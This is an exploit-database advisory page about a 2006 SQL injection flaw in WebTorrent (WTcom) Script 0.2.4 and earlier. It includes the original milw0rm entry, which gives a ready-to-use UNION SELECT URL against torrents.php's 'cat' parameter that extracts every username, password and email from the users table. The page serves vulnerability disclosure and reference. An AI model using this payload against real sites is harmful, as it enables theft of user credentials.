header-logo
Suggest Exploit
vendor:
WebTorrent (WTcom) Script
by:
sh1r081
9,3
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: WebTorrent (WTcom) Script
Affected Version From: 0.2.4 and earlier
Affected Version To: 0.2.4 and earlier
Patch Exists: YES
Related CWE: N/A
CPE: a:webtorrent:webtorrent
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WebTorrent (WTcom) Script <= 0.2.4

A remote SQL injection vulnerability exists in WebTorrent (WTcom) Script version 0.2.4 and earlier. An attacker can exploit this vulnerability to gain access to every username, password and email stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input to the 'cat' parameter in the 'torrents.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script.

Mitigation:

Upgrade to the latest version of WebTorrent (WTcom) Script.
Source

Exploit-DB raw data:

# WebTorrent (WTcom) Script <= 0.2.4
# ----------------------------------
# >>> Remote SQL Injection
# <<< Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 (sh1r081[at]gmail.com)

http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

# milw0rm.com [2006-08-17]

Navigation

Suggest Exploit

Services By CQR